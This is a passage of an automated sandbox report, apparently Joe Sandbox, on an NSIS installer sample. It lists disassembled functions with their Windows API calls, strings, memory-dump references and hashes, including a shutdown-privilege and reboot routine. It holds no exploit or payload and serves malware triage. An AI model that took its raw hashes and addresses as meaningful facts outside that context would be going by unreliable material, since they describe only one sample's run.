TMP, xrefs: 004034A0
Error launching installer, xrefs: 0040351F
Vx+, xrefs: 0040348B
", xrefs: 00403341
SeShutdownPrivilege, xrefs: 004036BE
NSIS Error, xrefs: 0040330B
UXTHEME, xrefs: 0040329A, 0040329F, 004032A5
.tmp, xrefs: 004035AF
~nsu, xrefs: 00403593
TEMP, xrefs: 00403498
\Temp, xrefs: 0040346A

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CharCurrentDeleteDirectoryEnvironmentHandleNextPathTempTokenVariableWindows$AddressAdjustCloseCommandCopyInfoInitializeLineLookupModuleOpenPrivilegePrivilegesProcUninitializeValuelstrcmpilstrlen
String ID: "$.tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Vx+$\Temp$~nsu
API String ID: 626260513-4144396316
Opcode ID: f7d9469de542fe56ff305c7c8b091c3c8799d7bb7494c8b2633f7a123844b828
Instruction ID: 8af8fcedd10493f8e80c4eada79d0bae115e97f9cb4a2bc1da61e0caac86d092
Opcode Fuzzy Hash: f7d9469de542fe56ff305c7c8b091c3c8799d7bb7494c8b2633f7a123844b828
Instruction Fuzzy Hash: 0F91E270144741BAD7106F759D49E2F3EACAF8630AF05043EF581B61E2DB7C8A158B2E

Function 004057B5 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?), ref: 004057DE
lstrcatA.KERNEL32(007A0550,\*.*,007A0550,?,?), ref: 00405826
lstrcatA.KERNEL32(?,0040A014,?,007A0550,?,?), ref: 00405847
lstrlenA.KERNEL32(?,?,0040A014,?,007A0550,?,?), ref: 0040584D
FindFirstFileA.KERNEL32(007A0550,?,?,?,0040A014,?,007A0550,?,?), ref: 0040585E
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040590B
FindClose.KERNEL32(00000000), ref: 0040591C

Strings

\*.*, xrefs: 00405820

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: 431781be1718a0d33c081e233ae80cc558f5881f14e6cb9e5308166eef8fd087
Instruction ID: eea8dcc9899e8fe382e67b4d85d328ba4a3fbbae0ab86688a1659871ceec6938
Opcode Fuzzy Hash: 431781be1718a0d33c081e233ae80cc558f5881f14e6cb9e5308166eef8fd087
Instruction Fuzzy Hash: 4051E171800A08FADF226B618C45FAF7A78DF42728F14807BF841B51D2D73C4992DE69

Function 00404A80 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404A97
GetDlgItem.USER32(?,00000408), ref: 00404AA4
GlobalAlloc.KERNEL32(00000040,?), ref: 00404AF3
LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404B0A
SetWindowLongA.USER32(?,000000FC,00405088), ref: 00404B24
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B36
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404B4A
SendMessageA.USER32(?,00001109,00000002), ref: 00404B60
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B6C
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B7C
DeleteObject.GDI32(00000110), ref: 00404B81
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404BAC
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BB8
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C52
SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404C82

Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,00000001,00403EE0), ref: 004040BE

SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C96
GetWindowLongA.USER32(?,000000F0), ref: 00404CC4
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CD2
ShowWindow.USER32(?,00000005), ref: 00404CE2
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DDD
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E42
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E57
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E7B
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E9B
ImageList_Destroy.COMCTL32(?), ref: 00404EB0
GlobalFree.KERNEL32(?), ref: 00404EC0
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F39
SendMessageA.USER32(?,00001102,?,?), ref: 00404FE2
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FF1
InvalidateRect.USER32(?,00000000,00000001), ref: 00405011
ShowWindow.USER32(?,00000000), ref: 0040505F
GetDlgItem.USER32(?,000003FE), ref: 0040506A
ShowWindow.USER32(00000000), ref: 00405071

Strings

M, xrefs: 00404C3A
N, xrefs: 00404D1B
, xrefs: 00405049

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 4399c830adbd7d59991cca11517547b5d533efcb757e40cb4398398cc859d0e5
Instruction ID: a268e52f59abad667f40846b9330857a26eef97fbfd8c04b7b0b2c1eeebe026e
Opcode Fuzzy Hash: 4399c830adbd7d59991cca11517547b5d533efcb757e40cb4398398cc859d0e5
Instruction Fuzzy Hash: 56026DB0900209EFEB109FA8DD45AAE7BB5FB84314F10813AF610B62E1D7789D52DF58

Function 00405252 Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004052B1
GetDlgItem.USER32(?,000003EE), ref: 004052C0
GetClientRect.USER32(?,?), ref: 004052FD
GetSystemMetrics.USER32(00000002), ref: 00405304
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405325
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405336
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405349
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405357
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040536A
ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040538C
ShowWindow.USER32(?,00000008), ref: 004053A0
GetDlgItem.USER32(?,000003EC), ref: 004053C1
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053D1
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053EA
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053F6
GetDlgItem.USER32(?,000003F8), ref: 004052CF

Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,00000001,00403EE0), ref: 004040BE

GetDlgItem.USER32(?,000003EC), ref: 00405412
CreateThread.KERNEL32(00000000,00000000,Function_000051E6,00000000), ref: 00405420
CloseHandle.KERNEL32(00000000), ref: 00405427
ShowWindow.USER32(00000000), ref: 0040544A
ShowWindow.USER32(?,00000008), ref: 00405451
ShowWindow.USER32(00000008), ref: 00405497
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054CB
CreatePopupMenu.USER32 ref: 004054DC
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054F1
GetWindowRect.USER32(?,000000FF), ref: 00405511
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040552A
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405566
OpenClipboard.USER32(00000000), ref: 00405576
EmptyClipboard.USER32 ref: 0040557C
GlobalAlloc.KERNEL32(00000042,?), ref: 00405585
GlobalLock.KERNEL32(00000000), ref: 0040558F
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004055A3
GlobalUnlock.KERNEL32(00000000), ref: 004055BC
SetClipboardData.USER32(00000001,00000000), ref: 004055C7
CloseClipboard.USER32 ref: 004055CD

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: 84782df16d7ec059bf83c821ddbfeaa0f78f9d0c9a83925ce920f2e68e6ea0e3
Instruction ID: e249d6b51738ec221da1a53d9ec42c2df55930041f70e6241115b0d1b6ef0d10
Opcode Fuzzy Hash: 84782df16d7ec059bf83c821ddbfeaa0f78f9d0c9a83925ce920f2e68e6ea0e3
Instruction Fuzzy Hash: D0A15AB1900608BFDF119F64DD85EAF7BB9FB48344F10802AFA41B61A1CB794E519F68

Function 00403BA7 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BE3
ShowWindow.USER32(?), ref: 00403C00
DestroyWindow.USER32 ref: 00403C14
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C30
GetDlgItem.USER32(?,?), ref: 00403C51
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C65
IsWindowEnabled.USER32(00000000), ref: 00403C6C
GetDlgItem.USER32(?,00000001), ref: 00403D1A
GetDlgItem.USER32(?,00000002), ref: 00403D24
SetClassLongA.USER32(?,000000F2,?), ref: 00403D3E
SendMessageA.USER32(0000040F,00000000,00000001), ref: 00403D8F
GetDlgItem.USER32(?,00000003), ref: 00403E35
ShowWindow.USER32(00000000,?), ref: 00403E56
EnableWindow.USER32(?,?), ref: 00403E68
EnableWindow.USER32(?,?), ref: 00403E83
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E99
EnableMenuItem.USER32(00000000), ref: 00403EA0
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403EB8
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403ECB
lstrlenA.KERNEL32(0079F548,?,0079F548,00000000), ref: 00403EF5
SetWindowTextA.USER32(?,0079F548), ref: 00403F04
ShowWindow.USER32(?,0000000A), ref: 00404038

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: e0d780eba1b088fa93d6fd4ed72d6ff884873a26146dcd9c5e819f50ed4c5972
Instruction ID: b507ef7cb9582abf258fe264cbdb2372651992ce94f69c67437d7eaacc5d437d
Opcode Fuzzy Hash: e0d780eba1b088fa93d6fd4ed72d6ff884873a26146dcd9c5e819f50ed4c5972
Instruction Fuzzy Hash: 09C1B0B1500204AFDB216F25EE85E2B7AB9EB8630AF00853EF741B11F1CB3D59529B5D

Function 0040380A Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2

lstrcatA.KERNEL32(007AA000,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,76F93410,007AA400,007A9000), ref: 00403885
lstrlenA.KERNEL32(007A1EE0,007A9400,?,?,007A1EE0,00000000,007A9400,007AA000,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,76F93410), ref: 004038FA
lstrcmpiA.KERNEL32(?,.exe), ref: 0040390D
GetFileAttributesA.KERNEL32(007A1EE0), ref: 00403918
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,007A9400), ref: 00403961

Part of subcall function 00405F4B: wsprintfA.USER32 ref: 00405F58

RegisterClassA.USER32(007A26E0), ref: 0040399E
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004039B6
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039EB
ShowWindow.USER32(00000005), ref: 00403A21
GetClassInfoA.USER32(00000000,RichEdit20A,007A26E0), ref: 00403A4D
GetClassInfoA.USER32(00000000,RichEdit,007A26E0), ref: 00403A5A
RegisterClassA.USER32(007A26E0), ref: 00403A63
DialogBoxParamA.USER32(?,00000000,00403BA7,00000000), ref: 00403A82

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 0040383E
.exe, xrefs: 00403907
.DEFAULT\Control Panel\International, xrefs: 00403870
RichEdit, xrefs: 00403A54
_Nb, xrefs: 0040397D, 004039E5
RichEd20, xrefs: 00403A27
&z, xrefs: 00403970
RichEd32, xrefs: 00403A35
RichEdit20A, xrefs: 00403A45, 00403A4B

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$&z
API String ID: 1975747703-471597453
Opcode ID: 6a61cbbd4cf0e9c1d01e5c8b3980943b7258060f4ff29637f7b3df1c92db6b4f
Instruction ID: 79248491ef2bc55f5e0c4717b820805706146ebb855d4f379394f0877404e8f0
Opcode Fuzzy Hash: 6a61cbbd4cf0e9c1d01e5c8b3980943b7258060f4ff29637f7b3df1c92db6b4f
Instruction Fuzzy Hash: 6C61C6B0240640BED610AF659D45F3B3A6CD785749F10813FF985B62E2DB7D9D028B2D

Function 004041E6 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404271
GetDlgItem.USER32(00000000,000003E8), ref: 00404285
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004042A3
GetSysColor.USER32(?), ref: 004042B4
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004042C3
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004042D2
lstrlenA.KERNEL32(?), ref: 004042D5
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042E4
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042F9
GetDlgItem.USER32(?,0000040A), ref: 0040435B
SendMessageA.USER32(00000000), ref: 0040435E
GetDlgItem.USER32(?,000003E8), ref: 00404389
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004043C9
LoadCursorA.USER32(00000000,00007F02), ref: 004043D8
SetCursor.USER32(00000000), ref: 004043E1
LoadCursorA.USER32(00000000,00007F00), ref: 004043F7
SetCursor.USER32(00000000), ref: 004043FA
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404426
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040443A

Strings

N, xrefs: 00404377

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
Instruction ID: a3db5b80d5f6c8d56f7a184239f37e003a0a90a84a660de175ffc46cbe068f47
Opcode Fuzzy Hash: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
Instruction Fuzzy Hash: D361B5B1A40204BFEF109F60DD45F6A7B69FB84704F10802AFB05BA1D1C7B8A951CF99

Function 0040336A Relevance: 31.7, APIs: 10, Strings: 8, Instructions: 156stringfilecomCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000400,007AA400,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403453
GetWindowsDirectoryA.KERNEL32(007AA400,000003FB,?,?,00000160), ref: 00403464
lstrcatA.KERNEL32(007AA400,\Temp,?,?,00000160), ref: 00403470
GetTempPathA.KERNEL32(000003FC,007AA400,007AA400,\Temp,?,?,00000160), ref: 00403484
lstrcatA.KERNEL32(007AA400,Low,?,?,00000160), ref: 0040348C
SetEnvironmentVariableA.KERNEL32(TEMP,007AA400,007AA400,Low,?,?,00000160), ref: 0040349D
SetEnvironmentVariableA.KERNEL32(TMP,007AA400,?,?,00000160), ref: 004034A5
DeleteFileA.KERNEL32(007AA000,?,00000006,00000008,0000000A), ref: 004034B9

Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,007A2740,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA

OleUninitialize.OLE32(?,?,?,00000160), ref: 00403567
ExitProcess.KERNEL32 ref: 00403588
lstrcatA.KERNEL32(007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 0040359B
lstrcatA.KERNEL32(007AA400,0040A14C,007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 004035AA
lstrcatA.KERNEL32(007AA400,.tmp,007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 004035B5
lstrcmpiA.KERNEL32(007AA400,007A9C00), ref: 004035C1
SetCurrentDirectoryA.KERNEL32(007AA400,007AA400,?,?,?,?,00000160), ref: 004035DD
DeleteFileA.KERNEL32(0079E108,0079E108,?,007A4000,?,?,?,?,?,00000160), ref: 00403636
CopyFileA.KERNEL32(007AAC00,0079E108,00000001), ref: 0040364A
CloseHandle.KERNEL32(00000000,0079E108,0079E108,?,0079E108,?,?,?,?,?,00000160), ref: 00403677
GetCurrentProcess.KERNEL32(00000028,?,?,00000160), ref: 004036A5
OpenProcessToken.ADVAPI32(00000000), ref: 004036AC
LookupPrivilegeValueA.ADVAPI32(?,SeShutdownPrivilege,?), ref: 004036C4
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,?,?,?,?,?,SeShutdownPrivilege,?), ref: 004036E3
ExitWindowsEx.USER32(00000002,80040002), ref: 00403707
ExitProcess.KERNEL32 ref: 0040372A

Strings

Low, xrefs: 00403486
Error launching installer, xrefs: 0040351F
TMP, xrefs: 004034A0
Vx+, xrefs: 0040348B
TEMP, xrefs: 00403498
", xrefs: 0040337B
\Temp, xrefs: 0040346A
, xrefs: 00403373

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: lstrcat$Process$ExitFile$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableWindows$AdjustCloseCopyHandleLookupOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrcpyn
String ID: $"$Error launching installer$Low$TEMP$TMP$Vx+$\Temp
API String ID: 109303428-1567535582
Opcode ID: 47daceb2ab4096686ecc9a2b31aec42577ef1639cad44f253f4325b14c3c5fae
Instruction ID: ee86094215728b75d9dae95d605afab31ae71dc2a4c79600e913a2246e4d607c
Opcode Fuzzy Hash: 47daceb2ab4096686ecc9a2b31aec42577ef1639cad44f253f4325b14c3c5fae
Instruction Fuzzy Hash: 9451033050879069E7256F354D9962F7FE9ABC2306F08447FE4927A2E2CA7C4A04C72F

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,007A2740,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
Instruction ID: 1ef7ef1d3183d2fe833be2fdc16277d02f602c466de40d92ea6efb336f18bcfe
Opcode Fuzzy Hash: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
Instruction Fuzzy Hash: 53417C71400249AFCB058FA5DE459BF7BB9FF45314F00802EF9A1AA1A0C778DA55DFA4

Function 00403248 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 93stringCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 0040326D
GetVersion.KERNEL32 ref: 00403273
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032A6

Strings

NSIS Error, xrefs: 0040330B
UXTHEME, xrefs: 0040329A, 0040329F, 004032A5
, xrefs: 00403373

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: ErrorModeVersionlstrlen
String ID: $NSIS Error$UXTHEME
API String ID: 758611499-3141987311
Opcode ID: 5462c7cef10a1cbdaf0d8c8109fbba7c3d0b3e9ceb939e16fe40e67dfc00e37f
Instruction ID: 2a398feea240def2510372ba555c9adfae5b6ad84a20a3a993315f833025e39d
Opcode Fuzzy Hash: 5462c7cef10a1cbdaf0d8c8109fbba7c3d0b3e9ceb939e16fe40e67dfc00e37f
Instruction Fuzzy Hash: C731A3B0404341BFE7216F709E09B1B3EA8AB46309F00457EF9C5B62D2DB7C49098B6E

Function 00405C5C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000000,00000000,?,?,00405DED,?,?), ref: 00405C8D
GetShortPathNameA.KERNEL32(?,007A12D8,00000400), ref: 00405C96

Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405B2D

GetShortPathNameA.KERNEL32(?,007A16D8,00000400), ref: 00405CB3
wsprintfA.USER32 ref: 00405CD1
GetFileSize.KERNEL32(00000000,00000000,007A16D8,C0000000,00000004,007A16D8,?), ref: 00405D0C
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D1B
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D53
SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,007A0ED8,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405DA9
GlobalFree.KERNEL32(00000000), ref: 00405DBA
CloseHandle.KERNEL32(00000000), ref: 00405DC1

Part of subcall function 00405B86: GetFileAttributesA.KERNEL32(00000003,00402E04,007AAC00,80000000,00000003), ref: 00405B8A
Part of subcall function 00405B86: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BAC

Strings

[Rename], xrefs: 00405D3B, 00405D4D
%s=%s, xrefs: 00405CC7

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

